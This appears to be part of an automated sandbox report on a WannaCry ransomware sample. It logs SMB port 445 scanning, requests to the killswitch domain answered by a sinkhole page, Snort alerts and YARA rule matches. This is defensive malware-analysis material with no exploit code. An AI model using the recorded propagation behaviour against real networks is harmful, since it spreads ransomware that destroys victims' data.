                Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
                Source: stN592INV6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

                Networking

                barindex
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 May 2023 03:35:38 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 7c3ea7649c729b63-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 May 2023 03:35:39 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 7c3ea76a6c8b371f-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.6:59575 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.6:49704 -> 104.16.173.80:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.6:49704
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.6:49786 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.6:49705 -> 104.16.173.80:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.6:49705
                Source: global trafficTCP traffic: Count: 85 IPs: 107.165.99.30,107.165.99.74,107.165.99.73,107.165.99.72,107.165.99.71,107.165.99.70,107.165.99.38,107.165.99.37,107.165.99.36,107.165.99.35,107.165.99.79,107.165.99.34,107.165.99.78,107.165.99.33,107.165.99.77,107.165.99.32,107.165.99.76,107.165.99.31,107.165.99.75,107.165.99.29,107.165.99.28,107.165.99.63,107.165.99.62,107.165.99.61,107.165.99.60,107.165.99.1,107.165.99.5,107.165.99.27,107.165.99.4,107.165.99.26,107.165.99.25,107.165.99.241,107.165.99.3,107.165.99.69,107.165.99.24,107.165.99.2,107.165.99.68,107.165.99.23,107.165.99.9,107.165.99.67,107.165.99.22,107.165.99.8,107.165.99.66,107.165.99.21,107.165.99.7,107.165.99.65,107.165.99.20,107.165.99.6,107.165.99.64,107.165.99.19,107.165.99.18,107.165.99.17,107.165.99.52,107.165.99.51,107.165.99.50,107.165.99.16,107.165.99.15,107.165.99.59,107.165.99.14,107.165.99.58,107.165.99.13,107.165.99.57,107.165.99.12,107.165.99.56,107.165.99.11,107.165.99.55,107.165.99.10,107.165.99.54,107.165.99.53,107.165.99.41,107.165.99.40,107.165.99.84,107.165.99.83,107.165.99.82,107.165.99.81,107.165.99.80,107.165.99.49,107.165.99.48,107.165.99.47,107.165.99.46,107.165.99.45,107.165.99.44,107.165.99.43,107.165.99.42,107.165.99.39
                Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: unknownNetwork traffic detected: IP country count 17
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 23.0.174.90
                Source: unknownTCP traffic detected without corresponding DNS query: 137.59.244.89
                Source: unknownTCP traffic detected without corresponding DNS query: 190.118.148.211
                Source: unknownTCP traffic detected without corresponding DNS query: 120.77.189.201
                Source: unknownTCP traffic detected without corresponding DNS query: 203.113.203.78
                Source: unknownTCP traffic detected without corresponding DNS query: 61.49.83.44
                Source: unknownTCP traffic detected without corresponding DNS query: 42.153.119.52
                Source: unknownTCP traffic detected without corresponding DNS query: 12.119.25.17
                Source: unknownTCP traffic detected without corresponding DNS query: 86.18.224.16
                Source: unknownTCP traffic detected without corresponding DNS query: 168.248.8.247
                Source: unknownTCP traffic detected without corresponding DNS query: 62.24.28.70
                Source: unknownTCP traffic detected without corresponding DNS query: 162.149.186.105
                Source: unknownTCP traffic detected without corresponding DNS query: 95.151.132.161
                Source: unknownTCP traffic detected without corresponding DNS query: 11.111.31.149
                Source: unknownTCP traffic detected without corresponding DNS query: 190.108.6.156
                Source: unknownTCP traffic detected without corresponding DNS query: 146.15.103.115
                Source: unknownTCP traffic detected without corresponding DNS query: 143.34.176.103
                Source: unknownTCP traffic detected without corresponding DNS query: 200.42.254.144
                Source: unknownTCP traffic detected without corresponding DNS query: 181.13.26.231
                Source: unknownTCP traffic detected without corresponding DNS query: 89.115.165.85
                Source: unknownTCP traffic detected without corresponding DNS query: 217.209.229.25
                Source: unknownTCP traffic detected without corresponding DNS query: 75.204.201.85
                Source: unknownTCP traffic detected without corresponding DNS query: 153.69.48.166
                Source: unknownTCP traffic detected without corresponding DNS query: 153.222.136.183
                Source: unknownTCP traffic detected without corresponding DNS query: 201.9.113.86
                Source: unknownTCP traffic detected without corresponding DNS query: 108.64.144.230
                Source: stN592INV6.exeString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000001.00000002.619089050.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&h
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2h
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/L
                Source: stN592INV6.exe, 00000001.00000002.618210719.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
                Source: stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comTERNAME
                Source: stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comx86)
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kryptoslogic.com
                Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!2_2_004014A6
                Source: Yara matchFile source: stN592INV6.exe, type: SAMPLE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.1fe70a4.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.1feb104.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.200e128.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.252e96c.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.252e96c.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.1fdc084.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.24fc8c8.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.250b948.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.200e128.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.25078e8.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.stN592INV6.exe.1feb104.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.358678367.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.618272695.000000000042E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.349998939.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.353120233.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.358785850.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.619719683.0000000001FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.621829646.000000000250B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: stN592INV6.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: stN592INV6.exe PID: 6052, type: MEMORYSTR
                Source: Yara matchFile source: C:\Windows\tasksche.exe, type: DROPPED

                System Summary

                barindex
                Source: stN592INV6.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: stN592INV6.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: stN592INV6.exe, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: stN592INV6.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.1fdc084.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.24fc8c8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 1.2.stN592INV6.exe.250b948.8.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.0.stN592INV6.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.0.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 0.2.stN592INV6.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 1.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                Source: 0.2.stN592INV6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (based on rule by US CERT)
